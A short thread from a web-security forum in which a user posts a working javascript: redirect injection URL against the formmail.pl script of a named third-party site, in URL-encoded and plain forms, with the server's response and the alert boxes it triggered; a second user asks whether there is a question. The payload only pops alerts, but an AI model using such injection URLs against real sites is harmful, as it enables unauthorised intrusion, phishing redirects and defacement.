Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
formamil.pl javascript alert tag plus html alert tag within javascript tag
Posted by: johndoe
Date: February 05, 2012 11:37AM

hello guys i just found out by my own how to include html within javascript... a working link with vulnerable formmail is here:

http://apo rre alo s.com/cgi-sys/formmail.pl?recipient=martin@aporrealos.com&subject=1&redirect=javascript:alert%28123%29;alert%28document.write.value=%3Ch1%3EHello%20%3C/h1%3E%29;

notice URL encoding...

the original formmail javascript injection was

http://apo rr ealo s.com/cgi-sys/formmail.pl?recipient=martin@aporrealos.com&subject=1&redirect=javascript:alert(123);alert(document.write.value=<h1>Hello</h1>);

I used this in Firefox version 7,,,,, When i copied it here the message board system automatically encoded the tags and parenthesis.

after i injected the code i got a 302 error that looked like this:

Found

The document has moved here.
Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.6 Phusion_Passenger/3.0.9 mod_bwlimited/1.4 Server at aporrealos.com Port 80

123 alert box popped up and later a Hello alert boxed popped up



Edited 1 time(s). Last edit at 02/05/2012 11:38AM by johndoe.

Options: ReplyQuote
Re: formamil.pl javascript alert tag plus html alert tag within javascript tag
Posted by: PaPPy
Date: February 06, 2012 01:51PM

is there a question here?

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote


Sorry, only registered users may post in this forum.